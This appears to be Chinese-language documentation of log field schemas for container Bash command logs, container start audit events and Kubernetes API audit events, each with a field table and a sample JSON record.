容器 Bash 日志
名称 | 类型 | 含义 |
image_id | string | 镜像 ID |
container_id | string | 容器 ID |
image_name | string | 镜像名称 |
container_name | string | 容器名称 |
cmd | string | 命令行参数 |
{"cmd": "exit","container_id": "fcdbbfae","container_name": "/reverseshell","image_id": "sha256:eeb6ee3f","image_name": "centos:7"}
容器启动审计日志
名称 | 类型 | 含义 |
image_id | string | 镜像 ID |
container_id | string | 容器 ID |
image_name | string | 镜像名称 |
container_name | string | 容器名称 |
status | string | 容器状态 |
id | string | 容器 ID |
from | string | 基础镜像名称 |
Type | string | 事件类型 |
Action | string | 操作 |
scope | string | 部署方式 |
{"Action": "exec_start","container_id": "a197708a59b2809","container_name": "-","from": "registry.xxx.com/service/mysql@sha256:xxx","id": "a197708a59b2809","image_id": "-","image_name": "-","scope": "local","status": "exec_start","Type": "container"}
Kubernetes API 审计日志
名称 | 类型 | 含义 |
image_id | string | 镜像 ID |
container_id | string | 容器 ID |
image_name | string | 镜像名称 |
container_name | string | 容器名称 |
clusterId | string | 集群 ID |
kind | string | API事件类型 |
apiVersion | string | API 版本 |
level | string | 日志等级 |
auditID | string | 日志唯一索引 ID |
stage | string | K8s API 请求状态 |
requestURI | string | K8s API 请求 URI |
verb | string | 操作类型 |
sourceIPs | string | 请求用户 IP |
userAgent | string | 请求用户容器/用户对应客户端 |
requestReceivedTimestamp | string | 请求到达 Apiserver 的时间戳 |
stageTimestamp | string | 当前阶段处理请求的时间戳 |
{"apiVersion": "audit.k8s.io/v1","auditID": "xxx-xxx-xxx-9d69-xxx","clusterId": "-","container_id": "-","container_name": "-","image_id": "-","image_name": "-","kind": "Event","level": "Request","requestReceivedTimestamp": "2024-01-01T13:20:48.899288Z","requestURI": "/apis/batch/v1beta1/cronjobs?limit=500","sourceIPs": "127.0.0.0","stage": "ResponseComplete","stageTimestamp": "2024-01-01T13:20:48.900236Z","userAgent": "kube-controller-manager/v1.18.0 (linux/amd64) kubernetes","verb": "list"}
